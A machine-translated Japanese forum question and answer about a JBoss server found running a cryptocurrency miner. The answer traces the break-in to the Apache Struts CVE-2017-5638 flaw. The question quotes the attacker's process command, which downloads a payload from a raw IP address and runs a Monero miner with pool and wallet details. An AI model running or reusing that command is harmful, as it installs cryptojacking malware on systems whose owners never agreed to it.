JBoss AS 7.1.0最終的なセキュリティの問題

Question

最後の日に私のサーバー上で疑わしい実行中のプロセスがサーバー上に見つかりました。

jboss 23276 0.0 0.0 113108 644 ?  S 04:25 0:00 /bin/bash -c cd /tmp; rm yam; pkill -9 yam; pkill -9 minergate-cli;curl -ks http://107.155.106.174/t/5tf-1478613950.txt > yam || (wget https://107.155.106.174/t/5tf-1478613950.txt --no-check-certifica 
jboss 23277 374 0.1 424456 35600 ?  Sl 04:25 2880:22 ./yam --mining-params xmr:av=0&donation-interval=50 -c x -M stratum+tcp://dxzgadfgsdfgsdfgsdfgsdfgwerjukQdysdddRFch2CGykmqWUJPJW2hf23AaJWXmEPe96xYyYVDGn7qN:x@xmr-usa.dwarfpool.com:9050/ 

私は、インターネット上で検索し、誰かが採掘をビットコインする計算ノードとして私のサーバーを使用していることであるように思われています。だから誰かが私のサーバー上でこれをアップロードして実行することができました。私の知る限りでは、パスワードへのアクセス権がなく、Linuxユーザーjbossのみでこれを行うことができ、jbossアプリケーションもこのユーザーで実行されています。

簡単な解決策として、私はrootとしてtmpフォルダに同じ名前のファイルを作成していますので、上書きするアクセス権はありません。また、これらのプロセスパラメータの一部を含むプロセスが実行中であるかどうかを毎分確認するためのスクリプトを実行しています。

この問題の原因を見つけたいと思います。 jboss管理コンソールが無効になります。

BTW：私のサーバーはCentos 7とjavaバージョン "1.7.0_79"を実行します。

Answer 1

あなたは私たちのサーバー上にあったのと同じ問題があります。

それは私たちの場合、誰かが採掘およびオペレーティングシステム（SSHバージョンやOSの家族、ユーザー、...）に関するいくつかの情報を取得しようとしていたこのhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638このhttps://cwiki.apache.org/confluence/display/WW/S2-045

に見て、ApacheのStrutsの中vulnereabilityについてです。 Fortunatelly私たちは専用アカウントの下でアプリケーションを実行しており、公開されていないポート（攻撃された不正なプロキシアプリケーション）はありません。しかし、いくつかのログをチェックし、いくつかの "multipart/form-data"（私たちの場合）を探してください。

grep -r -ni 'multipart/form-data'